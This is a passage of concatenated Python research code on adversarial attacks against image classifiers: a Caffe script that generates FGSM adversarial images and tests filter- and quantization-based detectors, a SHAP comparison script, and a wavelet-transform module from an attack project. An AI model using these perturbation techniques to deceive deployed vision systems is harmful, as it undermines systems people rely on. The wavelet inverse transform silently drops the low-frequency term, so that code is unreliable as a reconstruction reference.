Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[6]:
def trainCrossMeanFilters(rootDir,true_class):
print(rootDir)
coefficient = [5,9, 13, 17]
kernelIndex = -1
for kernelSize in xrange(3,10,2):
startTime = time.time()
print('cross filter, size = ', kernelSize)
list_dirs = os.walk(rootDir)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
start = (kernelSize-1)//2
end = 224-start
kernelIndex+=1
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = crossMeanFilterOperations(original_data, start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = crossMeanFilterOperations(adversarial_data, start, end, coefficient[kernelIndex])
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):#FP
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[10]:
def trainScalarQuantization(rootDir,true_class,left=True):
print(rootDir)
intervals = [128,85,64,51,43,37,32,28,26]
for intervalIndex in range(9):
startTime = time.time()
print('NBinterval = ', intervalIndex+2, '; interval size = ', intervals[intervalIndex])
list_dirs = os.walk(rootDir)
original_classified_wrong_number = 0
disturbed_failure_number = 0
Total=TTP=TP=FP=FN=0
for root, dirs, files in list_dirs:
for f in files:
original_data=transformer.preprocess('data', caffe.io.load_image(os.path.join(root, f)))
net.blobs['data'].data[...] = original_data
ori_out = net.forward()
pred_class = ori_out['prob'][0].argmax()
if pred_class != true_class:
original_classified_wrong_number+=1
continue
grad = compute_gradient(original_data, pred_class)
delta = np.sign(grad)
adversarial_data=add_matrix(original_data,delta,1.0)
normalization(adversarial_data)
net.blobs['data'].data[...] = adversarial_data
adv_out = net.forward()
adv_class = adv_out['prob'][0].argmax()
if adv_class == true_class:
disturbed_failure_number+=1
continue
Total+=1
ori_processed = scalarQuantization(original_data, intervals[intervalIndex], left=left)
net.blobs['data'].data[...] = ori_processed
ori_filtered_out = net.forward()
ori_filtered_class = ori_filtered_out['prob'][0].argmax()
adv_processed = scalarQuantization(adversarial_data, intervals[intervalIndex], left=left)
net.blobs['data'].data[...] = adv_processed
adv_filtered_out = net.forward()
adv_filtered_class = adv_filtered_out['prob'][0].argmax()
if(ori_filtered_class!=true_class):
FP+=1
if (adv_filtered_class!=adv_class):
TP+=1
if (adv_filtered_class == true_class):
TTP+=1
else:
FN+=1
print("Overall results: ")
str1 = '%d-%d-%d: TP = %d; FN = %d; FP = %d; TTP = %d' % (Total,original_classified_wrong_number,disturbed_failure_number,TP,FN,FP,TTP)
print(str1)
endTime = time.time()
print('lasting ', endTime-startTime, 'seconds')
Recall=TP*1.0/(TP+FN)
Precision=TP*1.0/(TP+FP)
print('********************************')
print ("Recall: ",Recall)
print ("Precision: ",Precision)
print('********************************')
# In[11]:
caffe.set_mode_gpu()
net = load_model()
transformer = caffe.io.Transformer({'data': net.blobs['data'].data.shape})
transformer.set_transpose('data', (2,0,1))
transformer.set_raw_scale('data', 255) #images in [0,255] range instead of [0,1]
transformer.set_channel_swap('data', (2,1,0)) #channels in BGR order instead of RGB
diamonds = [np.array([[0,1,0],[1,1,1],[0,1,0]]), np.array([[0,0,1,0,0],[0,1,1,1,0],[1,1,1,1,1],[0,1,1,1,0],[0,0,1,0,0]]),
np.array([[0,0,0,1,0,0,0],[0,0,1,1,1,0,0],[0,1,1,1,1,1,0],[1,1,1,1,1,1,1],[0,1,1,1,1,1,0],[0,0,1,1,1,0,0],[0,0,0,1,0,0,0]]),
np.array([[0,0,0,0,1,0,0,0,0],[0,0,0,1,1,1,0,0,0],[0,0,1,1,1,1,1,0,0],[0,1,1,1,1,1,1,1,0],[1,1,1,1,1,1,1,1,1],[0,1,1,1,1,1,1,1,0],[0,0,1,1,1,1,1,0,0],[0,0,0,1,1,1,0,0,0],[0,0,0,0,1,0,0,0,0],])]
imageDirs = ['/home/ll/DeepDetector/TestImagenet/Goldfish','/home/ll/DeepDetector/TestImagenet/Clock',
'/home/ll/DeepDetector/TestImagenet/Pineapple']
imageLabels = [1,530,953]
# In[ ]:
for i in range(3):
trainBoxMeanFilters(imageDirs[i],imageLabels[i])
trainDiamondMeanFilters(imageDirs[i],imageLabels[i],diamonds)
trainCrossMeanFilters(imageDirs[i],imageLabels[i])
# In[ ]:
for i in range(3):
trainScalarQuantization(imageDirs[i],imageLabels[i])
trainScalarQuantization(imageDirs[i],imageLabels[i],left=False)
```
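A standalone illustration, not part of the Caffe script above, of what `scalarQuantization` does to pixel values in the [0, 255] range; `scalar_quantization` here is just a NumPy re-statement of the function above.
```python
# Sketch: left-aligned vs. bin-centered scalar quantization of [0, 255] pixel values.
import numpy as np

def scalar_quantization(x, interval, left=True):
    q = np.array(x, dtype=np.float32)
    q //= interval            # snap each value to the lower edge of its bin
    q *= interval
    if not left:
        q += interval // 2    # optionally shift to the bin center
    return q

x = np.array([0., 42., 128., 200., 255.])
print(scalar_quantization(x, 43))              # [  0.   0.  86. 172. 215.]
print(scalar_quantization(x, 43, left=False))  # [ 21.  21. 107. 193. 236.]
```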
#### File: adaptive-jpeg-compression/remove_code/shap_compare_adv.py
```python
import os
import sys
# import matplotlib.pyplot as plt
import numpy as np
# import sys
import xlwt
import shutil
sys.path.append('../common_code')
# from img_ploter import img_ploter
# sys.path.append('../common_code')
import general as g
def read_shap(file_name):
shap_all=np.loadtxt(file_name)
del_idx = np.argwhere(np.all(shap_all[..., :] == 0, axis=1))
shap_del = np.delete(shap_all, del_idx, axis=0)
shap_bin=(shap_del>0)*1
flag_norm = 0
if 1 == flag_norm:
shap_show = shap_del/np.sum(shap_del,axis=1).reshape(-1,1)
else:
shap_show = shap_del
return shap_show,shap_bin
def read_attr(file_name):
attr=np.loadtxt(file_name)
attr[3]=attr[3]*100
return attr[3:6]
def write_xls_col(data,legends,saved_name):
exl=xlwt.Workbook()
exl_sheet=exl.add_sheet('data')
for i in range(len(data)):
exl_sheet.write(0,2*i,'Importance')
exl_sheet.write(0,2*i+1,'error')
data_now = data[i].mean(axis=0).astype(np.float64)
std_now = data[i].std(axis=0).astype(np.float64)
names = legends[i].split('_')
for j in range(len(names)):
exl_sheet.write(j+1,2*i,names[j])
for j in range(len(data_now)):
exl_sheet.write(j+len(names)+1,2*i,data_now[j])
exl_sheet.write(j+len(names)+1,2*i+1,std_now[j])
exl.save('temp.xls')
shutil.move('temp.xls',saved_name)
return exl,exl_sheet
def write_xls_num(data,legends,saved_name):
exl=xlwt.Workbook()
exl_sheet=exl.add_sheet('data')
for i in range(len(data)):
exl_sheet.write(0,2*i,'num')
exl_sheet.write(0,2*i+1,'error')
data_now = data[i].sum(axis=0).astype(np.float64)/data[i].shape[0]
std_now = np.zeros_like(data_now)
names = legends[i].split('_')
for j in range(len(names)):
exl_sheet.write(j+1,2*i,names[j])
for j in range(len(data_now)):
exl_sheet.write(j+len(names)+1,2*i,data_now[j])
exl_sheet.write(j+len(names)+1,2*i+1,std_now[j])
exl.save('temp.xls')
shutil.move('temp.xls',saved_name)
return exl,exl_sheet
def read_shap_single(file_name):
shap_all = np.loadtxt(file_name)
del_idx = np.argwhere(np.all(shap_all[..., :] == 0, axis=1))
shap_del = np.delete(shap_all, del_idx, axis=0)
flag_norm = 1
if 1 == flag_norm:
shap_show = shap_del/np.sum(shap_del,axis=1).reshape(-1,1)
else:
shap_show = shap_del
return shap_show
def read_shap_batch(saved_dir,method,players):
model_num=len(method)
shap_all=np.zeros((model_num,players))
for i in range(model_num):
shap_now = read_shap_single(os.path.join(saved_dir,method[i],'shap_all.txt'))
# shap_all.append(shap_now.mean(axis=0).reshape(1,8))
shap_all[i,:]=shap_now.mean(axis=0).reshape(1,players)
return shap_all
def read_pecp_single(file_name):
nums = np.loadtxt(file_name)
pecp = np.array((nums[4],nums[5]))
return pecp
def read_pecp_batch(saved_dir,method,players):
model_num=len(method)
pecp_num=2
pecp_all=np.zeros((model_num,pecp_num))
for i in range(model_num):
pecp = read_pecp_single(os.path.join(saved_dir,method[i],'nums.txt'))
pecp_all[i,:]=pecp.reshape(1,pecp_num)
return pecp_all
# inputs
# saved_dir = sys.argv[1]
# model = [sys.argv[2]]
saved_dir='../saved_tests/img_shap'
model=['allconv']
att_method=['FGSM_L2_IDP','PGD_L2_IDP','CW_L2_IDP','Deepfool_L2_IDP',
'FGSM_Linf_IDP','PGD_Linf_IDP','CW_Linf_IDP',
'FGSM_L2_UAP','PGD_L2_UAP','CW_L2_UAP','Deepfool_L2_UAP',]
eps_L2=['0.1','0.5','1.0','10.0','100.0']
eps_Linf=['0.005','0.01','0.1','1.0','10.0']
if 'imagenet' in model[0]:
fft_level=g.levels_all_imagenet
else:
fft_level=g.levels_all_cifar
'''
Compare all attack settings
'''
shap_show_all=[]
shap_bin_all=[]
legends=[]
for i in range(len(model)):
for j in range(len(att_method)):
if 'L2' in att_method[j]:
eps = eps_L2
else:
eps=eps_Linf
if 'CW_L2_IDP' in att_method[j]:
eps = [eps[0]]
if 'Deepfool_L2_IDP' in att_method[j]:
eps = [eps[0]]
for k in range(len(eps)):
dir_name=model[i]+'_'+att_method[j]+'_'+eps[k]
file_name=os.path.join(saved_dir,dir_name,'shap_all.txt')
if os.path.exists(file_name):
shap_show,shap_bin_now = read_shap(file_name)
else:
print('Not exist %s'%file_name)
shap_show= np.zeros([1,fft_level])
shap_bin_now=np.zeros([1,fft_level])
# attr=read_attr(os.path.join(saved_dir,dir_name,'nums.txt'))
shap_show_all.append(shap_show)
shap_bin_all.append(shap_bin_now)
legends.append(dir_name)
write_xls_col(shap_show_all,legends,os.path.join(saved_dir,model[i]+'_shap_all.xls'))
write_xls_num(shap_bin_all,legends,os.path.join(saved_dir,model[i]+'_shap_bin_all.xls'))
```
#### File: SSAH-adversarial-attack-main/attack/DWT.py
```python
import torch
from torch.autograd import Function
import pywt
import numpy as np
import math
from torch.nn import Module
class DWTFunction_2D_tiny(Function):
@staticmethod
def forward(ctx, input, matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
L = torch.matmul(matrix_Low_0, input)
LL = torch.matmul(L, matrix_Low_1)
return LL
@staticmethod
def backward(ctx, grad_LL):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
grad_L = torch.matmul(grad_LL, matrix_Low_1.t())
grad_input = torch.matmul(matrix_Low_0.t(), grad_L)
return grad_input, None, None, None, None
class IDWT_2D_tiny(Module):
"""
input: lfc -- (N, C, H/2, W/2)
hfc_lh -- (N, C, H/2, W/2)
hfc_hl -- (N, C, H/2, W/2)
hfc_hh -- (N, C, H/2, W/2)
output: the original 2D data -- (N, C, H, W)
"""
def __init__(self, wavename):
"""
2D inverse DWT (IDWT) for 2D image reconstruction
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(IDWT_2D_tiny, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.dec_lo
self.band_low.reverse()
self.band_high = wavelet.dec_hi
self.band_high.reverse()
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
generate the transform matrices
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, LL):
"""
recontructing the original 2D data
the original 2D data = \mathcal{L}^T * lfc * \mathcal{L}
+ \mathcal{H}^T * hfc_lh * \mathcal{L}
+ \mathcal{L}^T * hfc_hl * \mathcal{H}
+ \mathcal{H}^T * hfc_hh * \mathcal{H}
:param LL: the low-frequency component
:param LH: the high-frequency component, hfc_lh
:param HL: the high-frequency component, hfc_hl
:param HH: the high-frequency component, hfc_hh
:return: the original 2D data
"""
assert len(LL.size()) == 4
self.input_height = LL.size()[-2] * 2
self.input_width = LL.size()[-1] * 2
self.get_matrix()
return IDWTFunction_2D_tiny.apply(LL, self.matrix_low_0, self.matrix_low_1)
class DWT_2D_tiny(Module):
"""
input: the 2D data to be decomposed -- (N, C, H, W)
output -- lfc: (N, C, H/2, W/2)
#hfc_lh: (N, C, H/2, W/2)
#hfc_hl: (N, C, H/2, W/2)
#hfc_hh: (N, C, H/2, W/2)
DWT_2D_tiny only outputs the low-frequency component, which is used in WaveCNet;
the all four components could be get using DWT_2D, which is used in WaveUNet.
"""
def __init__(self, wavename):
"""
2D discrete wavelet transform (DWT) for 2D image decomposition
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(DWT_2D_tiny, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.rec_lo
# print('band_low', self.band_low, len(self.band_low)) # [1/sqrt(2) = 0.707, 0.707]
self.band_high = wavelet.rec_hi
# print('band_high', self.band_high) # [0.707, -0.707]
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low) # 2
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
# print('band_length_half', self.band_length_half) # 1
def get_matrix(self):
"""
generate the transform matrices
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width)) # 224
L = math.floor(L1 / 2) # 112
matrix_h = np.zeros((L, L1 + self.band_length - 2)) # (112, 224 + 2 -2)
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
# print('matrix_h_0', matrix_h_0.shape)
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
# print('matrix_h_1', matrix_h_1.shape)
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
# print('matrix_g_0', matrix_g_0.shape)
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
# print('matrix_g_1', matrix_g_1.shape)
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
# print('matrix_h_0', matrix_h_0.shape)
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
# print('matrix_h_1', matrix_h_1.shape)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, input):
"""
input_lfc = \mathcal{L} * input * \mathcal{L}^T
#input_hfc_lh = \mathcal{H} * input * \mathcal{L}^T
#input_hfc_hl = \mathcal{L} * input * \mathcal{H}^T
#input_hfc_hh = \mathcal{H} * input * \mathcal{H}^T
:param input: the 2D data to be decomposed
:return: the low-frequency component of the input 2D data
"""
assert len(input.size()) == 4
self.input_height = input.size()[-2]
self.input_width = input.size()[-1]
self.get_matrix()
return DWTFunction_2D_tiny.apply(input, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0,
self.matrix_high_1)
class IDWTFunction_2D_tiny(Function):
@staticmethod
def forward(ctx, input_LL, matrix_Low_0, matrix_Low_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1)
L = torch.matmul(input_LL, matrix_Low_1.t())
output = torch.matmul(matrix_Low_0.t(), L)
return output
@staticmethod
def backward(ctx, grad_output):
matrix_Low_0, matrix_Low_1 = ctx.saved_variables
grad_L = torch.matmul(matrix_Low_0, grad_output)
grad_LL = torch.matmul(grad_L, matrix_Low_1)
return grad_LL, None, None # one gradient per forward input (input_LL, matrix_Low_0, matrix_Low_1)
class DWT_2D(Module):
"""
input: the 2D data to be decomposed -- (N, C, H, W)
output -- lfc: (N, C, H/2, W/2)
hfc_lh: (N, C, H/2, W/2)
hfc_hl: (N, C, H/2, W/2)
hfc_hh: (N, C, H/2, W/2)
"""
def __init__(self, wavename):
"""
2D discrete wavelet transform (DWT) for 2D image decomposition
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(DWT_2D, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.rec_lo
self.band_high = wavelet.rec_hi
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
generate the transform matrices
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, input):
"""
input_lfc = \mathcal{L} * input * \mathcal{L}^T
input_hfc_lh = \mathcal{H} * input * \mathcal{L}^T
input_hfc_hl = \mathcal{L} * input * \mathcal{H}^T
input_hfc_hh = \mathcal{H} * input * \mathcal{H}^T
:param input: the 2D data to be decomposed
:return: the low-frequency and high-frequency components of the input 2D data
"""
assert len(input.size()) == 4
self.input_height = input.size()[-2]
self.input_width = input.size()[-1]
self.get_matrix()
return DWTFunction_2D.apply(input, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0, self.matrix_high_1)
class IDWT_2D(Module):
"""
input: lfc -- (N, C, H/2, W/2)
hfc_lh -- (N, C, H/2, W/2)
hfc_hl -- (N, C, H/2, W/2)
hfc_hh -- (N, C, H/2, W/2)
output: the original 2D data -- (N, C, H, W)
"""
def __init__(self, wavename):
"""
2D inverse DWT (IDWT) for 2D image reconstruction
:param wavename: pywt.wavelist(); in the paper, 'chx.y' denotes 'biorx.y'.
"""
super(IDWT_2D, self).__init__()
wavelet = pywt.Wavelet(wavename)
self.band_low = wavelet.dec_lo
self.band_low.reverse()
self.band_high = wavelet.dec_hi
self.band_high.reverse()
assert len(self.band_low) == len(self.band_high)
self.band_length = len(self.band_low)
assert self.band_length % 2 == 0
self.band_length_half = math.floor(self.band_length / 2)
def get_matrix(self):
"""
generate the transform matrices
generating the matrices: \mathcal{L}, \mathcal{H}
:return: self.matrix_low = \mathcal{L}, self.matrix_high = \mathcal{H}
"""
L1 = np.max((self.input_height, self.input_width))
L = math.floor(L1 / 2)
matrix_h = np.zeros((L, L1 + self.band_length - 2))
matrix_g = np.zeros((L1 - L, L1 + self.band_length - 2))
end = None if self.band_length_half == 1 else (-self.band_length_half + 1)
index = 0
for i in range(L):
for j in range(self.band_length):
matrix_h[i, index + j] = self.band_low[j]
index += 2
matrix_h_0 = matrix_h[0:(math.floor(self.input_height / 2)), 0:(self.input_height + self.band_length - 2)]
matrix_h_1 = matrix_h[0:(math.floor(self.input_width / 2)), 0:(self.input_width + self.band_length - 2)]
index = 0
for i in range(L1 - L):
for j in range(self.band_length):
matrix_g[i, index + j] = self.band_high[j]
index += 2
matrix_g_0 = matrix_g[0:(self.input_height - math.floor(self.input_height / 2)),
0:(self.input_height + self.band_length - 2)]
matrix_g_1 = matrix_g[0:(self.input_width - math.floor(self.input_width / 2)),
0:(self.input_width + self.band_length - 2)]
matrix_h_0 = matrix_h_0[:, (self.band_length_half - 1):end]
matrix_h_1 = matrix_h_1[:, (self.band_length_half - 1):end]
matrix_h_1 = np.transpose(matrix_h_1)
matrix_g_0 = matrix_g_0[:, (self.band_length_half - 1):end]
matrix_g_1 = matrix_g_1[:, (self.band_length_half - 1):end]
matrix_g_1 = np.transpose(matrix_g_1)
if torch.cuda.is_available():
self.matrix_low_0 = torch.Tensor(matrix_h_0).cuda()
self.matrix_low_1 = torch.Tensor(matrix_h_1).cuda()
self.matrix_high_0 = torch.Tensor(matrix_g_0).cuda()
self.matrix_high_1 = torch.Tensor(matrix_g_1).cuda()
else:
self.matrix_low_0 = torch.Tensor(matrix_h_0)
self.matrix_low_1 = torch.Tensor(matrix_h_1)
self.matrix_high_0 = torch.Tensor(matrix_g_0)
self.matrix_high_1 = torch.Tensor(matrix_g_1)
def forward(self, LL, LH, HL, HH):
"""
recontructing the original 2D data
the original 2D data = \mathcal{L}^T * lfc * \mathcal{L}
+ \mathcal{H}^T * hfc_lh * \mathcal{L}
+ \mathcal{L}^T * hfc_hl * \mathcal{H}
+ \mathcal{H}^T * hfc_hh * \mathcal{H}
:param LL: the low-frequency component
:param LH: the high-frequency component, hfc_lh
:param HL: the high-frequency component, hfc_hl
:param HH: the high-frequency component, hfc_hh
:return: the original 2D data
"""
assert len(LL.size()) == len(LH.size()) == len(HL.size()) == len(HH.size()) == 4
self.input_height = LL.size()[-2] + HH.size()[-2]
self.input_width = LL.size()[-1] + HH.size()[-1]
self.get_matrix()
return IDWTFunction_2D.apply(LL, LH, HL, HH, self.matrix_low_0, self.matrix_low_1, self.matrix_high_0,
self.matrix_high_1)
class IDWTFunction_2D(Function):
@staticmethod
def forward(ctx, input_LL, input_LH, input_HL, input_HH,
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
# L = torch.add(torch.matmul(input_LL, matrix_Low_1.t()), torch.matmul(input_LH, matrix_High_1.t()))
L = torch.matmul(input_LH, matrix_High_1.t())
H = torch.add(torch.matmul(input_HL, matrix_Low_1.t()), torch.matmul(input_HH, matrix_High_1.t()))
output = torch.add(torch.matmul(matrix_Low_0.t(), L), torch.matmul(matrix_High_0.t(), H))
return output
@staticmethod
def backward(ctx, grad_output):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
grad_L = torch.matmul(matrix_Low_0, grad_output)
grad_H = torch.matmul(matrix_High_0, grad_output)
grad_LL = torch.matmul(grad_L, matrix_Low_1)
grad_LH = torch.matmul(grad_L, matrix_High_1)
grad_HL = torch.matmul(grad_H, matrix_Low_1)
grad_HH = torch.matmul(grad_H, matrix_High_1)
return grad_LL, grad_LH, grad_HL, grad_HH, None, None, None, None
class DWTFunction_2D(Function):
@staticmethod
def forward(ctx, input, matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1):
ctx.save_for_backward(matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1)
L = torch.matmul(matrix_Low_0, input)
H = torch.matmul(matrix_High_0, input)
LL = torch.matmul(L, matrix_Low_1)
LH = torch.matmul(L, matrix_High_1)
HL = torch.matmul(H, matrix_Low_1)
HH = torch.matmul(H, matrix_High_1)
return LL, LH, HL, HH
@staticmethod
def backward(ctx, grad_LL, grad_LH, grad_HL, grad_HH):
matrix_Low_0, matrix_Low_1, matrix_High_0, matrix_High_1 = ctx.saved_variables
# grad_L = torch.add(torch.matmul(grad_LL, matrix_Low_1.t()), torch.matmul(grad_LH, matrix_High_1.t()))
grad_L = torch.matmul(grad_LH, matrix_High_1.t())
grad_H = torch.add(torch.matmul(grad_HL, matrix_Low_1.t()), torch.matmul(grad_HH, matrix_High_1.t()))
grad_input = torch.add(torch.matmul(matrix_Low_0.t(), grad_L), torch.matmul(matrix_High_0.t(), grad_H))
return grad_input, None, None, None, None
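# --- Hedged note and usage sketch (not part of the original file) ---
# Assuming `dwt` / `idwt` are instances of the module classes that wrap
# DWTFunction_2D / IDWTFunction_2D above, a typical round trip would be:
#     LL, LH, HL, HH = dwt(x)            # x: (N, C, H, W) tensor
#     x_detail = idwt(LL, LH, HL, HH)
# Note that IDWTFunction_2D.forward and DWTFunction_2D.backward both drop the
# LL term relative to the commented-out lines, so `x_detail` contains only the
# detail sub-bands (LH, HL, HH) rather than an exact reconstruction of x;
# this appears intentional in this variant.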
```
#### File: SSAH-adversarial-attack-main/utils/auxiliary_utils.py
```python
from torchvision import datasets, transforms
import numpy as np
import random
import torch
import os
import logging
def setup_seed(seed):
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
np.random.seed(seed)
random.seed(seed)
torch.backends.cudnn.deterministic = True
def normalize_fn(dataset):
if dataset == 'imagenet_val':
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])
else:
normalize = transforms.Normalize(mean=[0.491, 0.482, 0.446], std=[0.202, 0.199, 0.201])
return normalize
def predict(model, inputs, opt):
with torch.no_grad():
outputs = model(normalize_fn(opt.dataset)(inputs))
